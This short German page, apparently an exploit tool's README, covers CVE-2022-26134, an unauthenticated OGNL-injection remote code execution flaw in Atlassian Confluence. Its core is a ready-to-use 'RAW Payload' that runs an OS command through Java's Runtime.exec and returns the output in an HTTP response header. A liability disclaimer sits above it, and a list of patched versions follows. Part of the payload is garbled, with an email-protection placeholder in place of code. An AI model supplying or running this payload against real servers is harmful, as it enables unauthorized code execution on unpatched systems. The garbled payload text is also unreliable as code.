BotCon
Attlasian Confluence – Nicht authentifizierte Remotecodeausführung via OGNL-Injection (CVE-2022-26134)
- Am 2. Juni 2022 veröffentlichte Atlassian ein Sicherheitsbulletin für seine Confluence Server und Data Center Anwendungen, das eine kritische Schwachstelle zur nicht authentifizierten Remotecodeausführung hervorhebt. Die OGNL-Injection-Schwachstelle ermöglicht es einem nicht authentifizierten Benutzer, beliebigen Code auf einer Confluence Server- oder Data Center-Instanz auszuführen.
LESEN SIE DIES !
Mit Vorsicht verwenden. Sie sind für Ihre Handlungen verantwortlich.
Die Entwickler übernehmen keine Haftung und sind nicht verantwortlich für Missbrauch oder Schäden.

RAW Payload
${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
Fehlerdetails
-
Betroffenes Produkt :
- Confluence
- Confluence Server
- Confluence Data Center
-
Betroffene Versionen :
- Alle unterstützten Versionen von Confluence Server und Data Center sind betroffen.
- Confluence Server und Data Center Versionen nach 1.3.0 sind betroffen.
Gegenmaßnahmen
- Aktualisieren Sie Ihre Attlasian Confluence-Version auf diese reparierten Versionen:
- 7.4.17
- 7.13.7
- 7.14.3
- 7.15.2
- 7.16.4
- 7.17.4
- 7.18.1